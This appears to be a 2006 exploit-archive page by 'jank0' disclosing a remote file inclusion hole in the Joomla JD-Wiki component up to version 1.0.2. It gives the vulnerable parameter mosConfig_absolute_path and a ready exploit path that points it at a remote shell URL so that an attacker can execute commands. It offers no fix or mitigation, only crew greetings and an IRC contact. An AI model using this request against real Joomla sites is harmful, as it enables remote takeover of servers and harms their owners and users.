Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla JD-Wiki Component <= 1.0.2 Remote Include Vulnerability
# Published : 2006-08-07
# Author : jank0
# Previous Title : SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability
# Next Title : Modernbill <= 1.6 (config.php) Remote File Include Vulnerability

####################################################################################
#JD-Wiki Remote File Include
------------------------------------------------------------------------------------
JD-Wiki is the Joomla! integration of the nice DokuWiki.
DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating 
documentation of any kind.
------------------------------------------------------------------------------------
#Bug Found by: jank0
#greetz: hackbsd crew
#risk: dangerous
##this bug allows a remote atacker to execute commands via rfi

path: ?mosConfig_absolute_path=

xpl:
/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell


Contact: irc.undernet.org #hackbsd & #ircmasters

# www.Syue.com [2006-08-07]